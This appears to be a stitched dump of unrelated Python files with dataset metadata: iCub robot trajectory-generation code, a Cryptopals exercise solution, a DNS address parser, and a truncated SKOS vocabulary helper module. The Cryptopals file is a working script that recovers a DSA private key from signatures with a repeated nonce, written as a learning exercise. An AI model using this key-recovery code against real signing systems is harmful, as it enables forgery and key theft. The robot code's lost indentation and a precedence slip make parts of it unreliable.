# FUTURE BASE VELOCITIES
# ======================
# Extract future base velocities for blending (i.e. in the plot reference frame)
future_base_vel_plot = denormalized_current_output[24:36]
future_base_vel_blend = [[0.0, self.base_vel_norm]] # This is an approximation.
for k in range(0, len(future_base_vel_plot), 2):
future_base_vel_blend.append([-future_base_vel_plot[k + 1], future_base_vel_plot[k]])
# blend user-specified and network-predicted future base velocities
blended_base_velocities = trajectory_blending(future_base_vel_blend, base_velocities, self.t, self.tau_base_velocities)
# Reshape blended future base velocities
future_base_velocities_blend_features = []
for k in range(1, len(blended_base_velocities)):
future_base_velocities_blend_features.append(blended_base_velocities[k][1])
future_base_velocities_blend_features.append(-blended_base_velocities[k][0])
# Normalize future base velocities
future_base_velocities_blend_features_normalized = future_base_velocities_blend_features.copy()
for k in range(len(future_base_velocities_blend_features_normalized)):
future_base_velocities_blend_features_normalized[k] = (future_base_velocities_blend_features_normalized[k] -
self.Xmean_dict["future_base_velocities"][k]) / \
self.Xstd_dict["future_base_velocities"][k]
# Add the normalized blended future base velocities to the next input
next_nn_X.extend(future_base_velocities_blend_features_normalized)
return next_nn_X, blended_base_velocities
def autoregressive_usage_future_traj_len(self, next_nn_X: List, future_base_pos_blend_features: List) -> List:
"""Use the future length trajectory in an autoregressive fashion."""
# Compute the desired future trajectory length by summing the distances between future base positions
future_traj_length = 0
future_base_position_prev = future_base_pos_blend_features[0]
for future_base_position in future_base_pos_blend_features[1:]:
base_position_distance = np.linalg.norm(future_base_position - future_base_position_prev)
future_traj_length += base_position_distance
future_base_position_prev = future_base_position
# Normalize the desired future trajectory length
future_traj_length = future_traj_length - self.Xmean_dict["future_traj_length"] / self.Xstd_dict["future_traj_length"]
# Add the desired future trajectory length to the next input
next_nn_X.extend([future_traj_length])
return next_nn_X
def autoregressive_usage_joint_positions_and_velocities(self, next_nn_X: List, current_output: np.array) -> List:
"""Use the joint positions and velocities in an autoregressive fashion."""
# Add the (already normalized) joint positions to the next input
s = current_output[0][36:68]
next_nn_X.extend(s)
# Add the (already normalized) joint velocities to the next input
s_dot = current_output[0][68:100]
next_nn_X.extend(s_dot)
return next_nn_X
def check_robot_stopped(self, next_nn_X: List) -> None:
"""Check whether the robot is stopped (i.e. whether subsequent network inputs are almost identical)."""
# Compute the difference in norm between the current and the next network inputs
nn_X_difference_norm = np.linalg.norm(np.array(self.current_nn_X[0]) - np.array(next_nn_X))
# The robot is considered to be stopped if the difference in norm is lower than a threshold
if nn_X_difference_norm < self.nn_X_difference_norm_threshold:
self.stopped = True
else:
self.stopped = False
def update_autoregression_state(self, next_nn_X: List) -> None:
"""Update the autoregression-relevant information."""
self.current_nn_X = [next_nn_X]
self.current_past_trajectory_base_positions = self.new_past_trajectory_base_positions
self.current_past_trajectory_facing_directions = self.new_past_trajectory_facing_directions
self.current_past_trajectory_base_velocities = self.new_past_trajectory_base_velocities
self.current_facing_direction = self.new_facing_direction
self.current_world_R_facing = self.new_world_R_facing
self.current_base_position = self.new_base_position
self.current_ground_base_position = self.new_ground_base_position
self.current_base_yaw = self.new_base_yaw
def autoregression_and_blending(self, current_output: np.array, denormalized_current_output: np.array,
quad_bezier: List, facing_dirs: List, base_velocities: List,
world_H_base: np.array, base_H_chest: np.array) -> (List, List, List):
"""Handle the autoregressive usage of the network output blended with the user input from the joystick."""
# Update the bi-dimensional reference frame given by the base position and the facing direction
self.update_reference_frame(world_H_base=world_H_base, base_H_chest=base_H_chest)
# Initialize empty next input
next_nn_X = []
# Use the base positions in an autoregressive fashion
next_nn_X, blended_base_positions, future_base_pos_blend_features = \
self.autoregressive_usage_base_positions(next_nn_X=next_nn_X,
denormalized_current_output=denormalized_current_output,
quad_bezier=quad_bezier)
# Use the facing directions in an autoregressive fashion
next_nn_X, blended_facing_dirs = \
self.autoregressive_usage_facing_directions(next_nn_X=next_nn_X,
denormalized_current_output=denormalized_current_output,
facing_dirs=facing_dirs)
# Use the base velocities in an autoregressive fashion
next_nn_X, blended_base_velocities = \
self.autoregressive_usage_base_velocities(next_nn_X=next_nn_X,
denormalized_current_output=denormalized_current_output,
base_velocities=base_velocities)
# Use the future trajectory length in an autoregressive fashion
next_nn_X = self.autoregressive_usage_future_traj_len(next_nn_X=next_nn_X,
future_base_pos_blend_features=future_base_pos_blend_features)
# Use the joint positions and velocities in an autoregressive fashion
next_nn_X = self.autoregressive_usage_joint_positions_and_velocities(next_nn_X, current_output)
# Check whether the robot is stopped
self.check_robot_stopped(next_nn_X)
# Update autoregressive-relevant information for the next iteration
self.update_autoregression_state(next_nn_X)
return blended_base_positions, blended_facing_dirs, blended_base_velocities
@dataclass
class TrajectoryGenerator:
"""Class for generating trajectories."""
# Subcomponents of the trajectory generator
kincomputations: KinematicComputations
storage: StorageHandler
autoregression: Autoregression
plotter: Plotter
model: LearnedModel
# Iteration counter and generation rate
iteration: int = 0
generation_rate: float = 1/50
@staticmethod
def build(icub: iCub,
gazebo: scenario.GazeboSimulator,
kindyn: kindyncomputations.KinDynComputations,
storage_path: str,
training_path: str,
local_foot_vertices_pos: List,
initial_nn_X: List,
initial_past_trajectory_base_pos: List,
initial_past_trajectory_facing_dirs: List,
initial_past_trajectory_base_vel: List,
initial_base_height: List,
initial_base_yaw: float,
frontal_base_direction: List,
frontal_chest_direction: List,
nominal_DS_duration: float = 0.04,
difference_position_threshold: float = 0.04,
difference_height_norm_threshold: bool = 0.005,
base_vel_norm: float = 0.4,
tau_base_positions: float = 1.5,
tau_facing_dirs: float = 1.3,
tau_base_velocities: float = 1.3,
nn_X_difference_norm_threshold: float = 0.05,
ellipsoid_forward_axis: float = 1.0,
ellipsoid_side_axis: float = 0.9,
ellipsoid_backward_axis: float = 0.6,
ellipsoid_scaling: float = 0.4) -> "TrajectoryGenerator":
"""Build an instance of TrajectoryGenerator."""
# Build the kinematic computations handler component
kincomputations = KinematicComputations.build(kindyn=kindyn,
local_foot_vertices_pos=local_foot_vertices_pos,
icub=icub,
gazebo=gazebo,
nominal_DS_duration=nominal_DS_duration,
difference_position_threshold=difference_position_threshold,
difference_height_norm_threshold=difference_height_norm_threshold)
# Initialize the support vertex and the support foot
kincomputations.set_initial_support_vertex_and_support_foot()
# Build the storage handler component
storage = StorageHandler.build(storage_path)
# Build the autoregression handler component
autoregression = Autoregression.build(training_path=training_path,
initial_nn_X=initial_nn_X,
initial_past_trajectory_base_pos=initial_past_trajectory_base_pos,
initial_past_trajectory_facing_dirs=initial_past_trajectory_facing_dirs,
initial_past_trajectory_base_vel=initial_past_trajectory_base_vel,
initial_base_height=initial_base_height,
initial_base_yaw=initial_base_yaw,
frontal_base_direction=frontal_base_direction,
frontal_chest_direction=frontal_chest_direction,
base_vel_norm=base_vel_norm,
tau_base_positions=tau_base_positions,
tau_facing_dirs=tau_facing_dirs,
tau_base_velocities=tau_base_velocities,
nn_X_difference_norm_threshold=nn_X_difference_norm_threshold)
# Build the plotter component
plotter = Plotter.build(ellipsoid_forward_axis=ellipsoid_forward_axis,
ellipsoid_side_axis=ellipsoid_side_axis,
ellipsoid_backward_axis=ellipsoid_backward_axis,
ellipsoid_scaling=ellipsoid_scaling)
# Build the learned model component
model = LearnedModel.build(training_path=training_path)
return TrajectoryGenerator(kincomputations=kincomputations,
storage=storage,
autoregression=autoregression,
plotter=plotter,
model=model)
def restore_model_and_retrieve_tensors(self, session: tf.Session) -> (tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor):
"""Restore the learned model and retrieve the tensors of interest."""
# Restore the learned model
graph = self.model.restore_learned_model(session=session)
# Retrieve the tensors of interest
nn_X, nn_keep_prob, output, blending_coefficients = self.model.retrieve_tensors(graph)
return nn_X, nn_keep_prob, output, blending_coefficients
def retrieve_network_output_and_blending_coefficients(self, nn_X: tf.Tensor, nn_keep_prob: tf.Tensor, output: tf.Tensor,
blending_coefficients: tf.Tensor) -> (np.array, np.array, np.array):
"""Retrieve the network output (also denormalized) and the blending coefficients."""
# Retrieve the network output and the blending coefficients
current_output, current_blending_coefficients = self.model.evaluate_tensors(nn_X=nn_X,
current_nn_X=self.autoregression.current_nn_X,
nn_keep_prob=nn_keep_prob,
output=output,
blending_coefficients=blending_coefficients)
# Denormalize the network output
denormalized_current_output = denormalize(current_output, self.model.Ymean, self.model.Ystd)[0]
return current_output, denormalized_current_output, current_blending_coefficients
def apply_joint_positions_and_base_orientation(self, denormalized_current_output: List) -> (List, List):
"""Apply joint positions and base orientation from the output returned by the network."""
# Extract the new joint positions from the denormalized network output
joint_positions = np.asarray(denormalized_current_output[36:68])
# If the robot is stopped, handle unnatural in-place rotations by imposing zero angular base velocity
if self.autoregression.stopped:
omega = 0
else:
omega = denormalized_current_output[102]
# Extract the new base orientation from the output
base_yaw_dot = omega * self.generation_rate
new_base_yaw = self.autoregression.current_base_yaw + base_yaw_dot
new_base_rotation = Rotation.from_euler('xyz', [0, 0, new_base_yaw])
new_base_quaternion = Quaternion.to_wxyz(new_base_rotation.as_quat())
# Update the base orientation and the joint positions in the robot configuration
self.kincomputations.reset_robot_configuration(joint_positions=joint_positions,
base_position=self.autoregression.current_base_position,
base_quaternion=new_base_quaternion)
# Update the base base orientation and the joint positions in the configuration of the robot visualized in the simulator
self.kincomputations.reset_visual_robot_configuration(joint_positions=joint_positions,
base_quaternion=new_base_quaternion)
# Update the base yaw in the autoregression state
self.autoregression.new_base_yaw = new_base_yaw
return joint_positions, new_base_quaternion
def update_support_vertex_and_support_foot_and_footsteps(self) -> (str, bool):
"""Update the support vertex and the support foot. Handle updates of the footsteps list and of the deactivation
time of the last footstep."""
# Update support foot and support vertex while detecting new footsteps and deactivation time updates
support_foot, update_deactivation_time, update_footsteps_list = self.kincomputations.update_support_vertex_and_support_foot()
if update_deactivation_time:
# Define the swing foot
if support_foot == "r_foot":
swing_foot = "l_foot"
else:
swing_foot = "r_foot"
if self.storage.footsteps[swing_foot]:
# Update the deactivation time of the last footstep
self.storage.footsteps[swing_foot][-1]["deactivation_time"] = self.iteration * self.generation_rate
if update_footsteps_list:
# Retrieve the information related to the new footstep
new_footstep = self.kincomputations.footsteps_extractor.create_new_footstep(
kindyn=self.kincomputations.kindyn,
support_foot=support_foot,
activation_time=self.iteration * self.generation_rate)
# Update the footsteps storage
self.storage.update_footsteps_storage(support_foot=support_foot, footstep=new_footstep)
return support_foot, update_footsteps_list
def compute_kinematically_fasible_base_and_update_posturals(self, joint_positions: List,
base_quaternion: List, controlled_joints: List,
link_names: List) -> (List, List, List, List):
"""Compute kinematically-feasible base position and retrieve updated posturals."""
# Compute and apply kinematically-feasible base position
kinematically_feasible_base_position = \
self.kincomputations.compute_and_apply_kinematically_feasible_base_position( joint_positions=joint_positions,
base_quaternion=base_quaternion)
# Retrieve new posturals to be added to the list of posturals
new_base_postural, new_joints_postural, new_links_postural, new_com_postural = \
self.kincomputations.postural_extractor.create_new_posturals(base_position=kinematically_feasible_base_position,
base_quaternion=base_quaternion,
joint_positions=joint_positions,
controlled_joints=controlled_joints,
kindyn=self.kincomputations.kindyn,
link_names=link_names)
return new_base_postural, new_joints_postural, new_links_postural, new_com_postural
def retrieve_joystick_inputs(self, input_port: yarp.BufferedPortBottle, quad_bezier: List, base_velocities: List,
facing_dirs: List, raw_data: List) -> (List, List, List, List):
"""Retrieve user-specified joystick inputs received through YARP port."""
# The joystick input from the user written on the YARP port will contain 3 * 7 * 2 + 4 = 46 values:
# 0-13 are quad_bezier (x,y)
# 14-27 are base_velocities (x,y)
# 28-41 are facing_dirs (x,y)
# 42-45 are joystick inputs to be stored for future plotting (curr_x, curr_y, curr_z, curr_rz)
# Read from the input port
res = input_port.read(shouldWait=False)
if res is None:
if quad_bezier:
# If the port is empty but the previous joystick inputs are not empty, return them
return quad_bezier, base_velocities, facing_dirs, raw_data
else:
# If the port is empty and the previous joystick inputs are empty, return default values
default_quad_bezier = [[0, 0] for _ in range(len(self.autoregression.t))]
default_base_velocities = [[0, 0] for _ in range(len(self.autoregression.t))]
default_facing_dirs = [[0, 1] for _ in range(len(self.autoregression.t))]
default_raw_data = [0, 0, 0, -1] # zero motion direction (robot stopped), forward facing direction
return default_quad_bezier, default_base_velocities, default_facing_dirs, default_raw_data
else:
# If the port is not empty, retrieve the new joystick inputs
new_quad_bezier = []
new_base_velocities = []
new_facing_dirs = []
new_raw_data = []
for k in range(0, res.size() - 4, 2):
coords = [res.get(k).asFloat32(), res.get(k + 1).asFloat32()]
if k < 14:
new_quad_bezier.append(coords)
elif k < 28:
new_base_velocities.append(coords)
else:
new_facing_dirs.append(coords)
for k in range(res.size() - 4, res.size()):
new_raw_data.append(res.get(k).asFloat32())
return new_quad_bezier, new_base_velocities, new_facing_dirs, new_raw_data
def autoregression_and_blending(self, current_output: np.array, denormalized_current_output: np.array, quad_bezier: List,
facing_dirs: List, base_velocities: List) -> (List, List, List):
"""Use the network output in an autoregressive fashion and blend it with the user input."""
world_H_base = self.kincomputations.kindyn.get_world_base_transform()
base_H_chest = self.kincomputations.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="chest")
# Use the network output in an autoregressive fashion and blend it with the user input
blended_base_positions, blended_facing_dirs, blended_base_velocities = \
self.autoregression.autoregression_and_blending(current_output=current_output,
denormalized_current_output=denormalized_current_output,
quad_bezier=quad_bezier,
facing_dirs=facing_dirs,
base_velocities=base_velocities,
world_H_base=world_H_base,
base_H_chest=base_H_chest)
return blended_base_positions, blended_facing_dirs, blended_base_velocities
def update_storages_and_save(self, blending_coefficients: List, base_postural: List, joints_postural: List,
links_postural: List, com_postural: List, raw_data: List, quad_bezier: List,
base_velocities: List, facing_dirs: List, save_every_N_iterations: int) -> None:
"""Update the blending coefficients, posturals and joystick input storages and periodically save data."""
# Update the blending coefficients storage
self.storage.update_blending_coefficients_storage(blending_coefficients=blending_coefficients)
# Update the posturals storage
self.storage.update_posturals_storage(base=base_postural, joints=joints_postural,
links=links_postural, com=com_postural)
# Update joystick inputs storage
self.storage.update_joystick_inputs_storage(raw_data=raw_data, quad_bezier=quad_bezier,
base_velocities=base_velocities, facing_dirs=facing_dirs)
# Periodically save data
if self.iteration % save_every_N_iterations == 0:
# Before saving data, update the footsteps list
final_deactivation_time = self.iteration * self.generation_rate
updated_footsteps = self.kincomputations.footsteps_extractor.update_footsteps(
final_deactivation_time=final_deactivation_time, footsteps=self.storage.footsteps)
self.storage.replace_footsteps_storage(footsteps=updated_footsteps)
# Save data
self.storage.save_data_as_json()
def update_iteration_counter(self) -> None:
"""Update the counter for the iterations of the generator."""
# Debug
print(self.iteration)
if self.iteration == 1:
input("\nPress Enter to start the trajectory generation.\n")
self.iteration += 1
| 1.96875 | 2 |
set6/c44_attack_dsa_repeated_nonce.py | kangtastic/cryptopals | 1 | 12767432 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DSA nonce recovery from repeated nonce
#
# Cryptanalytic MVP award.
#
# This attack (in an elliptic curve group) broke the PS3. It is a great,
# great attack.
#
# In this file:
#
# https://cryptopals.com/static/challenge-data/44.txt
#
# find a collection of DSA-signed messages. (NB: each msg has a trailing
# space.)
#
# These were signed under the following pubkey:
#
# y = 2d026f4bf30195ede3a088da85e398ef869611d0f68f07
# 13d51c9c1a3a26c95105d915e2d8cdf26d056b86b8a7b8
# 5519b1c23cc3ecdc6062650462e3063bd179c2a6581519
# f674a61f1d89a1fff27171ebc1b93d4dc57bceb7ae2430
# f98a6a4d83d8279ee65d71c1203d2c96d65ebbf7cce9d3
# 2971c3de5084cce04a2e147821
#
# (using the same domain parameters as the previous exercise)
#
# It should not be hard to find the messages for which we have accidentally
# used a repeated "k". Given a pair of such messages, you can discover the "k"
# we used with the following formula:
#
# (m1 - m2)
# k = --------- mod q
# (s1 - s2)
#
# 9th Grade Math: Study It!
#
# If you want to demystify this, work out that equation from the original
# DSA equations.
#
# Basic cyclic group math operations want to screw you.
#
# Remember all this math is mod q; s2 may be larger than s1, for instance,
# which isn't a problem if you're doing the subtraction mod q. If you're
# like me, you'll definitely lose an hour to forgetting a paren or a mod q.
# (And don't forget that modular inverse function!)
#
# What's my private key? Its SHA-1 (from hex) is:
#
# ca8f6f7c66fa362d40760d135b763eb8527d3d52
#
import inspect
import os
import sys
from itertools import combinations
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getfile(lambda: 0)))))
from util.dsa import G, P, Q
from util.loader import loader
from util.misc import invmod
from util.sha1 import SHA1
from util.text import from_bytes, to_bytes, to_hexstring
def recover_dsa_privkey(k, r, s, z, p=P, q=Q, g=G):
k_inv = invmod(k, q)
if k_inv is None:
return None
x = (((((s * k) % q) - z) % q) * invmod(r, q)) % q
# This check isn't necessary. :)
# from util.misc import modexp
#
# sk, rk = (k_inv * (z + x * r)) % q, modexp(g, k, p) % q
# if s == sk and r == rk:
# return x
return x
def main():
# NOTE BEFORE STARTING: Do not be fooled! Signatures are created using
# private keys, notwithstanding the (perhaps intentionally misleading?)
# wording in this and the previous challenge that might imply otherwise.
lines = loader("44.txt", lambda l: l.rstrip("\n").split(": "))
msgs = []
for i in range(0, len(lines), 4):
block = lines[i : i + 4]
# After the rstrip() and split() above, a block looks like:
#
# [["msg", "Listen for me, you better listen for me now. "],
# ["s", "1267396447369736888040262262183731677867615804316"],
# ["r", "1105520928110492191417703162650245113664610474875"],
# ["m", "a4db3de27e2db3e5ef085ced2bced91b82e0df19"]]
#
# We have a message, the components of a DSA signature, and the SHA1
# hash of the message. Everything here's a `str` at the moment, so
# we'll transform the values.
#
# There's an error in "m" for one of the blocks in the challenge data,
# but we can just calculate the hash ourselves.
block[0][1] = block[0][1].encode()
block[1][1] = int(block[1][1])
block[2][1] = int(block[2][1])
block[3][1] = from_bytes(SHA1(block[0][1]).digest())
msgs.append({data[0]: data[1] for data in block})
print(f"Loaded {len(msgs)} DSA-signed messages.")
print("Recovering private key from the first repeated nonce we detect.")
for msg1, msg2 in combinations(msgs, 2):
if msg1["r"] != msg2["r"]:
continue
m1, m2 = msg1["m"], msg2["m"]
s1, s2 = msg1["s"], msg2["s"]
k = (((m1 - m2) % Q) * invmod(s1 - s2, Q)) % Q
privkey = recover_dsa_privkey(k, msg1["r"], s1, m1)
digest = SHA1(to_hexstring(to_bytes(privkey))).hexdigest()
assert digest == "ca8f6f7c66fa362d40760d135b763eb8527d3d52"
print()
print("Recovered key:", privkey)
break
else:
print("Failed to recover key!")
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
# Output:
#
# Loaded 11 DSA-signed messages.
# Recovering private key from the first repeated nonce we detect.
#
# Recovered key: 1379952329417023174824742221952501647027600451162
#
| 2.390625 | 2 |
async_dns/core/address.py | gera2ld/async_dns | 59 | 12767433 | import socket
from typing import Union
from urllib.parse import urlparse
from . import types
__all__ = [
'Host',
'Address',
'InvalidHost',
'InvalidIP',
]
class Host:
hostname: str
port: Union[int, None]
username: Union[str, None]
password: Union[str, None]
def __init__(self, netloc):
if isinstance(netloc, Host):
self._load_host(netloc)
elif isinstance(netloc, str):
self._load_str(netloc)
else:
self._load_tuple(netloc)
def _load_tuple(self, netloc):
if len(netloc) == 2:
self.hostname, self.port = netloc
self.username = self.password = None
else:
self.hostname, self.port, self.username, self.password = netloc
def _load_host(self, host):
self.hostname = host.hostname
self.port = host.port
self.username = host.username
self.password = host.password
def _load_str(self, netloc: str):
userinfo, _, host = netloc.rpartition('@')
if host.count(':') == 1 or '[' in host:
hostname, _, port = host.rpartition(':')
port = int(port)
else:
hostname, port = host, None
if hostname.startswith('[') and hostname.endswith(']'):
hostname = hostname[1:-1]
if userinfo:
username, _, password = userinfo.partition(':')
else:
username = password = None
self.hostname = hostname
self.port = port
self.username = username
self.password = password
@property
def host(self):
host = f'[{self.hostname}]' if ':' in self.hostname else self.hostname
if self.port:
host = f'{host}:{self.port}'
return host
def __str__(self):
userinfo = ''
if self.username:
userinfo += self.username
if self.password:
userinfo += ':' + self.password
userinfo += '@'
return userinfo + self.host
class InvalidHost(Exception):
pass
class InvalidIP(Exception):
pass
def get_ip_type(hostname):
if ':' in hostname:
# ipv6
try:
socket.inet_pton(socket.AF_INET6, hostname)
except OSError:
raise InvalidHost(hostname)
return types.AAAA
# ipv4 or domain name
try:
socket.inet_pton(socket.AF_INET, hostname)
except OSError:
# domain name
pass
else:
return types.A
class Address:
def __init__(self, hostinfo: Host, protocol: str, path: str=None):
self.hostinfo = hostinfo
self.protocol = protocol
self.path = path
self.ip_type = get_ip_type(self.hostinfo.hostname)
def __str__(self):
protocol = self.protocol or '-'
host = self.hostinfo.host
path = self.path or ''
return f'{protocol}://{host}{path}'
def __eq__(self, other):
return str(self) == str(other)
def __repr__(self):
return str(self)
def __hash__(self):
return hash(str(self))
def copy(self):
return Address(Host(self.hostinfo), self.protocol, self.path)
def to_addr(self):
return self.hostinfo.hostname, self.hostinfo.port
def to_ptr(self):
if self.ip_type is types.A:
return '.'.join(reversed(
self.hostinfo.hostname.split('.'))) + '.in-addr.arpa'
raise InvalidIP(self.hostinfo.hostname)
default_ports = {
'tcp': 53,
'udp': 53,
'tcps': 853,
'https': 443,
}
@classmethod
def parse(cls, value, default_protocol=None, allow_domain=False):
if isinstance(value, Address):
return value.copy()
if '://' not in value:
value = '//' + value
data = urlparse(value, scheme=default_protocol or 'udp')
hostinfo = Host(data.netloc)
if hostinfo.port is None:
hostinfo.port = cls.default_ports.get(data.scheme, 53)
addr = Address(hostinfo, data.scheme, data.path)
if not allow_domain and addr.ip_type is None:
raise InvalidHost(
hostinfo.hostname,
'You may pass `allow_domain=True` to allow domain names.')
return addr
| 3.28125 | 3 |
skos/__init__.py | alex-ip/vocview | 0 | 12767434 | <gh_stars>0
from rdflib.namespace import RDF, SKOS, DCTERMS, RDFS, OWL, DC
from rdflib import URIRef, Namespace
import markdown
from flask import url_for
from config import Config
from skos.concept_scheme import ConceptScheme, ConceptSchemeRenderer
from skos.concept import Concept, ConceptRenderer
from skos.register import Register
import helper
from datetime import date
from urllib import parse
# Controlled values
CONCEPT = 0
CONCEPTSCHEME = 1
COLLECTION = 2
SCHEMAORG = Namespace('http://schema.org/')
def list_concepts():
concepts = []
for c in Config.g.subjects(RDF.type, SKOS.Concept):
label = get_label(c)
date_created = get_created_date(c)
date_modified = get_modified_date(c)
definition = get_definition(c)
scheme = get_in_scheme(c)
concepts.append((c, label, [
('http://purl.org/dc/terms/created', date_created),
('http://purl.org/dc/terms/modified', date_modified),
('http://www.w3.org/2004/02/skos/core#definition', definition),
('http://www.w3.org/2004/02/skos/core#inScheme', scheme)
]))
return sorted(concepts, key=lambda i: i[1])
def list_concept_schemes():
concept_schemes = []
for cc in Config.g.subjects(RDF.type, SKOS.ConceptScheme):
label = get_label(cc)
date_created = get_created_date(cc)
date_modified = get_modified_date(cc)
description = get_description(cc)
concept_schemes.append((cc, label, [
('http://purl.org/dc/terms/created', date_created),
('http://purl.org/dc/terms/modified', date_modified),
description
]))
return sorted(concept_schemes, key=lambda i: i[1])
def _split_camel_case_label(label):
new_label = ''
last = 0
for i, letter in enumerate(label):
if letter.isupper():
new_label += ' {}'.format(label[last:i])
last = i
new_label += ' {}'.format(label[last:])
new_label = new_label.strip()
return new_label
def get_label(uri):
# TODO: title() capitalises all words, we need a post-process function to lower case words that are of types
# such as preposition and conjunction.
for label in Config.g.objects(URIRef(uri), SKOS.prefLabel):
return label
for label in Config.g.objects(URIRef(uri), DCTERMS.title):
return label
for label in Config.g.objects(URIRef(uri), RDFS.label):
return label
# Create a label from the URI.
label = helper.uri_label(uri)
label = _split_camel_case_label(label)
label = label
return label
def get_description(uri):
for description in Config.g.objects(URIRef(uri), DCTERMS.description):
return (DCTERMS.description, description)
for description in Config.g.objects(URIRef(uri), DC.description):
return (DC.description, description)
for description in Config.g.objects(URIRef(uri), RDFS.comment):
return (RDFS.comment, description)
def get_definition(uri):
for definition in Config.g.objects(URIRef(uri), SKOS.definition):
return definition
def get_class_types(uri):
types = []
for type in Config.g.objects(URIRef(uri), RDF.type):
# Only add URIs (and not blank nodes!)
if str(type)[:4] == 'http' \
and str(type) != 'http://www.w3.org/2004/02/skos/core#ConceptScheme' \
and str(type) != 'http://www.w3.org/2004/02/skos/core#Concept' \
and str(type) != 'http://www.w3.org/2004/02/skos/core#Collection':
types.append(type)
return types
def get_narrowers(uri):
narrowers = []
for narrower in Config.g.objects(URIRef(uri), SKOS.narrower):
label = get_label(narrower)
narrowers.append((narrower, label))
return sorted(narrowers, key=lambda i: i[1])
def get_broaders(uri):
broaders = []
for broader in Config.g.objects(URIRef(uri), SKOS.broader):
label = get_label(broader)
broaders.append((broader, label))
return sorted(broaders, key=lambda i: i[1])
def get_top_concept_of(uri):
top_concept_ofs = []
for tco in Config.g.objects(URIRef(uri), SKOS.topConceptOf):
label = get_label(tco)
top_concept_ofs.append((tco, label))
return sorted(top_concept_ofs, key=lambda i: i[1])
def get_top_concepts(uri):
top_concepts = []
for tc in Config.g.objects(URIRef(uri), SKOS.hasTopConcept):
label = get_label(tc)
top_concepts.append((tc, label))
return sorted(top_concepts, key=lambda i: i[1])
def get_change_note(uri):
for cn in Config.g.objects(URIRef(uri), SKOS.changeNote):
return cn
def get_alt_labels(uri):
labels = []
for alt_label in Config.g.objects(URIRef(uri), SKOS.altLabel):
labels.append(alt_label)
return sorted(labels)
def get_created_date(uri):
for created in Config.g.objects(URIRef(uri), DCTERMS.created):
created = created.split('-')
created = date(int(created[0]), int(created[1]), int(created[2][:2]))
return created
def get_modified_date(uri):
for modified in Config.g.objects(URIRef(uri), DCTERMS.modified):
modified = modified.split('-')
modified = date(int(modified[0]), int(modified[1]), int(modified[2][:2]))
return modified
def get_uri_skos_type(uri):
uri = parse.unquote_plus(uri)
for _ in Config.g.triples((URIRef(uri), RDF.type, SKOS.ConceptScheme)):
return CONCEPTSCHEME
for _ in Config.g.triples((URIRef(uri), RDF.type, SKOS.Concept)):
return CONCEPT
for _ in Config.g.triples((URIRef(uri), RDF.type, SKOS.Collection)):
return COLLECTION
return None
def get_properties(uri):
ignore = [
# Common
RDF.type, SKOS.prefLabel, DCTERMS.title, RDFS.label, DCTERMS.description, SKOS.definition, SKOS.changeNote,
DCTERMS.created, DCTERMS.modified, OWL.sameAs, RDFS.comment, SKOS.altLabel, DCTERMS.bibliographicCitation,
RDFS.isDefinedBy, DC.description, DCTERMS.creator, DCTERMS.contributor, SCHEMAORG.parentOrganization,
SCHEMAORG.contactPoint, SCHEMAORG.member, SCHEMAORG.subOrganization, SCHEMAORG.familyName,
URIRef('http://schema.semantic-web.at/ppt/propagateType'), SCHEMAORG.givenName, SCHEMAORG.honorificPrefix,
SCHEMAORG.jobTitle, SCHEMAORG.memberOf, URIRef('http://schema.semantic-web.at/ppt/appliedType'),
# Concept
SKOS.narrower, SKOS.broader, SKOS.topConceptOf, SKOS.inScheme, SKOS.closeMatch, SKOS.exactMatch,
# Concept Scheme
SKOS.hasTopConcept
]
properties = []
for _, property, value in Config.g.triples((URIRef(uri), None, None)):
if property in ignore:
continue
properties.append(((property, get_label(property)), value))
return properties
def get_in_scheme(uri):
"""A concept scheme in which the concept is a part of. A concept may be a member of more than one concept scheme"""
schemes = []
for scheme in Config.g.objects(URIRef(uri), SKOS.inScheme):
label = get_label(scheme)
schemes.append((scheme, label))
return schemes
def _add_narrower(uri, hierarchy, indent):
concepts = []
for concept in Config.g.objects(URIRef(uri), SKOS.narrower):
label = get_label(concept)
concepts.append((concept, label))
concepts.sort(key=lambda i: i[1])
for concept in concepts:
tab = indent * '\t'
hierarchy += tab + '- [{}]({})\n'.format(concept[1], url_for('routes.ob', uri=concept[0]))
hierarchy = _add_narrower(concept[0], hierarchy, indent + 1)
return hierarchy
def get_concept_hierarchy(uri):
hierarchy = ''
top_concepts = []
for top_concept in Config.g.objects(URIRef(uri), SKOS.hasTopConcept):
label = get_label(top_concept)
top_concepts.append((top_concept, label))
top_concepts.sort(key=lambda i: i[1])
for top_concept in top_concepts:
hierarchy += '- [{}]({})\n'.format(top_concept[1], url_for('routes.ob', uri=top_concept[0]))
hierarchy = _add_narrower(top_concept[0], hierarchy, 1)
return '<div id="concept-hierarchy">' + markdown.markdown(hierarchy) + '</div>'
def get_is_defined_by(uri):
for is_def in Config.g.objects(URIRef(uri), RDFS.isDefinedBy):
return is_def
def get_close_match(uri):
close_match = []
for cm in Config.g.objects(URIRef(uri), SKOS.closeMatch):
close_match.append(cm)
return close_match
def get_exact_match(uri):
exact_match = []
for em in Config.g.objects(URIRef(uri), SKOS.exactMatch):
exact_match.append(em)
return exact_match
def get_bibliographic_citation(uri):
for bg in Config.g.objects(URIRef(uri), DCTERMS.bibliographicCitation):
return bg
def get_schema_org_parent_org(uri):
for parent_org in Config.g.objects(URIRef(uri), SCHEMAORG.parentOrganization):
label = get_label(parent_org)
return (parent_org, label)
def get_schema_org_contact_point(uri):
for cp in Config.g.objects(URIRef(uri), SCHEMAORG.contactPoint):
label = get_label(cp)
return (cp, label)
def get_schema_org_members(uri):
members = []
for m in Config.g.objects(URIRef(uri), SCHEMAORG.member):
label = get_label(m)
members.append((m, label))
return members
def get_schema_org_sub_orgs(uri):
orgs = []
for org in Config.g.objects(URIRef(uri), SCHEMAORG.subOrganization):
label = get_label(org)
orgs.append((org, label))
return orgs
def get_schema_org_family_name(uri):
for fn in Config.g.objects(URIRef(uri), SCHEMAORG.familyName):
return fn
def get_schema_org_given_name(uri):
for gn in Config.g.objects(URIRef(uri), SCHEMAORG.givenName):
return gn
def get_schema_org_honorific_prefix(uri):
for hp in Config.g.objects(URIRef(uri), SCHEMAORG.honorificPrefix):
return hp
def get_schema_org_job_title(uri):
for jt in Config.g.objects(URIRef(uri), SCHEMAORG.jobTitle):
return jt
def get_schema_org_member_of(uri):
for org in Config.g.objects(URIRef(uri), SCHEMAORG.memberOf):
